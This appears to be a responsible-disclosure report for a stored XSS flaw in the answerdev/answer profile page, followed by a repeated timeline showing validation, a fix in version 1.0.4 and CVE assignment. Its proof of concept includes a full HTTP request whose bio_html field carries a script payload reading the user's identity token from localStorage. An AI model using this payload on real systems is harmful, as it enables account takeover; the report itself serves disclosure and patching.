Function of modifying userinfo has storage xss vulnerability in answerdev/answer

Valid

Reported on

Jan 11th 2023

Description

This vulnerability allows a malicious user to submit malicious html code on the profile page, causing the identity token to be stolen as soon as another user/administrator accesses the profile page, resulting in the account being taken over by someone else

Proof of Concept

step1. Log in to a user account
step2. Send the following http request message to modify personal information

PUT /answer/api/v1/user/info HTTP/1.1
Host: localhost:9080
Authorization: 5f61e241-91a4-11ed-a458-0242ac110002
Content-Type: application/json
Content-Length: 264


{
    "display_name":"xiaoming",
    "username":"xiaoming",
    "avatar":{
        "type":"custom",
        "gravatar":"",
        "custom":"http://localhost:9080/uploads/avatar/4KbtWx52o5Y.png"
    },
    "bio":"",
    "website":"",
    "location":"",
    "bio_html":"<img src=x onerror=alert(localStorage.getItem('_a_lui_')) />"
}

step3. When other users access the user's profile interface, they will be attacked by xss e.g: http://localhost:9080/users/xiaoming

Impact

References

template.HTML

We are processing your report and will contact the answerdev/answer team within 24 hours. 3 months ago

Re modified the report

3 months ago

Re modified the report

3 months ago

We created a GitHub Issue asking the maintainers to create a SECURITY.md 3 months ago

We have opened a pull request with a SECURITY.md for answerdev/answer to merge. 3 months ago

We have contacted a member of the answerdev/answer team and are waiting to hear back 3 months ago

We have sent a follow up to the answerdev/answer team. We will try again in 7 days. 2 months ago

A answerdev/answer maintainer validated this vulnerability 2 months ago

Re has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

commented 2 months ago

Researcher

Hi Team, Could you help me apply for a CVE ID for this vulnerability？Thanks

commented 2 months ago

Researcher

@admin

A answerdev/answer maintainer marked this as fixed in 1.0.4 with commit c3001d 2 months ago

The fix bounty has been dropped

This vulnerability has been assigned a CVE

A answerdev/answer maintainer published this vulnerability 2 months ago

Ben Harvie

commented 2 months ago

Admin

A CVE has been assigned as requested:)

to join this conversation

We are processing your report and will contact the answerdev/answer team within 24 hours. 3 months ago

Re modified the report

3 months ago

Re modified the report

3 months ago

We created a GitHub Issue asking the maintainers to create a SECURITY.md 3 months ago

We have opened a pull request with a SECURITY.md for answerdev/answer to merge. 3 months ago

We have contacted a member of the answerdev/answer team and are waiting to hear back 3 months ago

We have sent a follow up to the answerdev/answer team. We will try again in 7 days. 2 months ago

A answerdev/answer maintainer validated this vulnerability 2 months ago

Re has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

commented 2 months ago

Researcher

Hi Team, Could you help me apply for a CVE ID for this vulnerability？Thanks

commented 2 months ago

Researcher

@admin

A answerdev/answer maintainer marked this as fixed in 1.0.4 with commit c3001d 2 months ago

The fix bounty has been dropped

This vulnerability has been assigned a CVE

A answerdev/answer maintainer published this vulnerability 2 months ago

Ben Harvie

commented 2 months ago

Admin

A CVE has been assigned as requested:)

to join this conversation